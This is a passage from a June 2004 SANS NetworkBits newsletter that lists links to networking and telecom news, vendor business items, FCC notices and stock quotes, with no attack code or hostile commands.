could be worth more than 400 million dollars in Australia over the next
four to five years, says Louis Dupe, Telstra's business and government
voice managing director. While Telstra's Enterprise Speech Solutions
would be suitable for companies of 100 or more employees, the company
is developing products for smaller enterprises, says Dupe.
http://australianit.news.com.au/articles/0,7204,9723967%5E15306%5E%5Enbv%5E,00.html

-- Worms Costing Firms Millions
(28 May 2004)
A study done by security firm Sandvine concludes that the Internet
traffic generated by worm attacks on corporate networks results in
thousands to millions of pounds' worth of unplanned network and customer
support costs. Sandvine estimated that in the U.K. alone such costs
amounted to 22.4 million Euro. They also predict that worm attacks will
cost the European service provider sector more than 123 million Euro in
2004 and 159 million Euro in 2005.
http://www.networkitweek.co.uk/news/1155469
Related Article: Worms Still Number One Security Threat
http://www.networkitweek.co.uk/News/1153197

TELECOM NEWS

-- Trials Set for VoIP in Asia and Europe
(09 June 2004)
Telecommunication firm AT&T is set to start trials of its Internet
telephony services, voice over Internet Protocol, in Australia, Hong
Kong, Singapore and the United Kingdom based on the company's
CallVantage service. The trials will target multinational companies.
According to AT&T, the number of its customers using its VoIP services
has increased four fold.
http://news.zdnet.co.uk/communications/networks/0,39020345,39157140,00.htm

-- Record Set for IP Transmission Speeds
(08 June 2004)
MCI's plan to begin to upgrade and simplify its backbone, which they
announced in February, has led to the sending of IP packets from San
Francisco to San Juan at 40G bit/sec over its optical network. According
to Jack Wimmer, MCI vice president of Network Architecture and Advanced
Technology maintains that the company has no immediate plans to
introduce a commercial 40G services noting that it would only be a
limited number of customers, including government and university
researchers, who would require such high speeds.
http://www.computerworld.com.au/index.php?id=1706890780&eid=-6787

TUTORIAL

-- All You Need to Know About Domain Security
This tutorial examines the threats to domain security and how lack of
DNS security would impact the Internet.
http://www.ncasia.com/ViewArt.cfm?Magid=3&Artid=23924&Catid=5&subcat=50

WHITE PAPER

-- Enabling a Successful Wireless Enterprise
By Computer Associates
This white paper provides comprehensive information on what is going on
in the wireless arena covering topics such as wireless standards,
hardware and software. It also delves into topics such as concerns for
the mobile enterprise, including security and management, as well as how
to successfully set up a wireless enterprise.
http://www3.ca.com/Files/WhitePapers/22996-enabling_a_successful.pdf

OPINION

-- Free Phone Calls. Too Good to Last?
By Grace Chng
Grace Chng examines the development of a software, Skype, which allows
for high quality phone calls over the Internet for free, and the
expected response from telecommunications companies.
http://computertimes.asiaone.com.sg/columns/story/0,5104,1494,00.html?

-- Is Open Source IP Telephony Ready For Prime Time?
By Zeus Kerravala and Zenus Hutcheson
Zeus Kerravala, vice president of enterprise infrastructure research and
consulting at The Yankee Group, and Zenus Hutcheson, managing general
partner with St. Paul Venture Capital, debate the issue of open source
IP telephony and whether it is time for it to be implemented.
Kerravala argues against its implementation:
http://www.nwfusion.com/columnists/2004/0607faceoffno.html
Hutcheson argues for its implementation:
http://www.nwfusion.com/columnists/2004/0607faceoffyes.html

HOW'S BUSINESS

-- ALCATEL

Alcatel/Ditch Witch Demonstrate Vibratory Plow
http://www.cconvergence.com/shared/article/showArticle.jhtml?articleId=21402025

Alcatel Plans Handset Move
http://australianit.news.com.au/articles/0,7204,9777000%5E15320%5E%5Enbv%5E15306,00.html

LANS Systems Sues Alcatel
http://www.itnews.com.au/storycontent.asp?ID=6&Art_ID=19893

Alcatel To Deploy First Wireless Broadband Data Network In Zimbabwe
http://www.edubourse.com/finance/actualites.php?idActus=14539

-- CISCO

A Practical View of Cisco Services
http://techupdate.zdnet.com/techupdate/stories/main/Practical_View_Cisco_Services.html?tag=tu.arch.link

Cisco to Use Trend Micro Antivirus Technologies
http://www.reuters.com/newsArticle.jhtml?type=technologyNews&storyID=5364727&src=eDialog/GetContent§ion=news

Cisco Rolls Out Routing System
http://www.financialexpress.com/fe_full_story.php?content_id=60933

Trend Micro, Cisco to Fight Worms
http://www.computerworld.com.au/index.php/id;1565958375;fp;16;fpid;0

Cisco Gives Catalyst a 10G Jolt
http://computerworld.com.my/pcwmy.nsf/0/E6FB32ADB2EB17B148256EAC0025E548?OpenDocument

Foundry Fronts Cisco with Cheaper Router
http://www.computerworld.com.au/index.php/id;577674487;fp;16;fpid;0

Cisco Debuts High-End Router
http://www.washingtontechnology.com/news/19_5/datastream/23673-1.html

-- JUNIPER

Juniper Ready To Pop Pepsi
http://www.nwfusion.com/news/2004/0608pepsi.html

Shanghai Telecom Selects Juniper Networks
http://www.chinatechnews.com/index.php?action=show&type=news&id=1297

Juniper Networks 'SSL VPN Leader
http://www.lightreading.com/document.asp?site=lightreading&doc_id=54105

Juniper Upgrades VOIP Solution
http://www.lightreading.com/document.asp?site=supercomm&doc_id=53986

Juniper Touts Infranet
http://computerworld.com.my/pcwmy.nsf/0/FC5913E6F6EB24D348256EAC0022D53F?OpenDocument

-- NETWORK ASSOCIATES

Network Associates Delivers Next Generation Anti-Virus Solution
http://www.hardwarezone.com/news/view.php?cid=5&id=15824

Network Associates Rallies, But Obstacles Remain
http://www.thestreet.com/_tscs/tech/ronnaabramson/10164446.html

Network Associates Granted Broad Anti-spam Patent
http://www.computerworld.com/governmenttopics/government/legalissues/story/0,10801,93570,00.html

Network Associates Warms To Behaviour Blocking
http://www.theregister.co.uk/2004/06/04/mcafee_debuts_behaviour_blocking/

-- NORTEL

No News Is Bad News For Nortel
http://www.theregister.co.uk/2004/06/03/nortel_no_accounts/

Nortel Delays Revised Results
http://australianit.news.com.au/articles/0,7204,9731847%5E15306%5E%5Enbv%5E,00.html

Nortel Networks Enhances Edge Router
http://www.enterprisenetworksandservers.com/newsflash/art.php/274

Nortel Looks To Another Kind Of Networking
http://www.theglobeandmail.com/servlet/ArticleNews/TPStory/LAC/20040609/RRBCGLITCH09/TPBusiness/Canadian

CDSL Deploys Nortel Switches For VPN Tunneling
http://www.cxotoday.com/cxo/jsp/index.jsp?section=News&subsection=Business&subsection_code=1&file=template1.jsp&storyid=1034

Nortel Teams Up With Qovia
http://www.lightreading.com/document.asp?site=lightreading&doc_id=54034

SYMANTEC

Symantec Issues W32.KORGO.F Warning
http://www.cpilive.net/news_ver2/inside.asp?wherefrom=search&newsitem=69200483229AMCOMPUTER+NEWS+ME.htm&channel=COMPUTER+NEWS+ME

Symantec: Virus Deletes Your Whole Hard Drive
http://news.netcraft.com/archives/2004/06/08/symantec_new_virus_deletes_all_files.html

Symantec Nabs First 64-Bit Virus
http://www.computerworld.com/securitytopics/security/story/0,10801,93585,00.html

Symantec's Bizarre Swap
http://www.fool.com/News/mft/2004/mft04060406.htm

"Security is a Process," Says Symantec CEO Thompson
http://www.sys-con.com/story/?storyid=45066&DE=1

-- TIPPINGPOINT

Tipping Point: A Small Player With Big Credentials
http://www.it-director.com/article.php?articleid=11956

Utah Transit Authority Selects TippingPoint's UnityOne
http://www.tmcnet.com/usubmit/2004/May/1044383.htm

Tippingpoint's Net Loss, Revenue Rise
http://austin.bizjournals.com/austin/stories/2004/05/31/daily3.html

Korea University Deploys TippingPoint's UnityOne System
http://www.net-security.org/press.php?id=2184

FEDERAL REGISTER

-- FCC Establishes Office of Homeland Security
The Federal Communications Commission (FCC) is revising its rules to
promote more efficient and effective organizational structure and to
promote homeland security. Specifically, the FCC is revising its rules
to reflect the creation of the Office of Homeland Security within the
Enforcement Bureau, describe the Office's functions and delegated
authority, and make other conforming changes. The Commission is also
revising its rules to clarify how an Emergency Relocation Board will
operate during times of emergency under the Commission's Continuity of
Operations Plan (COOP) and setting out the line of succession to chair
the Board when no Commissioner is available to serve on the Board.
Effective: 08 July 2003.
http://edocket.access.gpo.gov/2004/04-11918.htm

-- FCC Seeks Input regarding Broadband Data Gathering Program
The Federal Communications Commission (FCC) is seeking comments about
whether it should extend and modify the local competition and broadband
data gathering program, established to collect basic information about
two critical areas of the communications industry: the deployment of
broadband services and the development of local telephone service
competition. The FCC seeks comments about specific proposals to improve
the program, including gathering more granular data from broadband
service providers and extending the program for five years beyond its
currently designated sunset in March 2005.
Comments due: 28 June 2004.
http://edocket.access.gpo.gov/2004/04-11322.htm

-- FCC on Fixed-Wireless Telecommunications Antennas
The Federal Communications Commission (FCC) has addressed four petitions
seeking reconsideration and/or clarification of the Commission's
determination to extend to users of fixed-wireless telecommunications
antennas the same OTARD (Over-the-Air-Reception Devices) protections
previously available to customers of multi-channel video service.
Effective: 27 July 2004.
http://edocket.access.gpo.gov/2004/04-12164.htm

STOCK QUOTES

13.55 Alcatel UP 0.02
28.82 Cisco UP 0.26
20.79 Juniper UP 0.34
17.16 Network Asssoc. DOWN 0.14
03.97 Nortel No Change
44.23 Symantec UP 0.38
25.05 Tipping Pt. UP 0.15

==end==

NetworkBits Editorial Board:
Aminah Grefer, Roland Grefer, Steve Lewis, Stephen Northcutt, Arrigo Triulzi

To submit comments, additional news items or other information you would
like to share with us, please send an email to NetworkBits@sans.org.

Please feel free to share this with interested parties via email, but
no posting is allowed on web sites. For a free subscription, and for
free posters) or to update a current subscription, visit
http://portal.sans.org/

An archive of past issues of the NetworkBits newsletter is available at
http://www.sans.org/newsletters/networkbits

The NetworkBits newsletter is also available as a RSS feed at
http://www.sans.org/newsletters/networkbits/rss

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFAyal4+LUG5KFpTkYRAk2mAJ4qETjhST8+jbKF6sHnnah4NqCIQwCdFDZ/
a86rkokQ3Mfybi9itZDEljQ=
=rl9E
-----END PGP SIGNATURE-----


Get Firefox!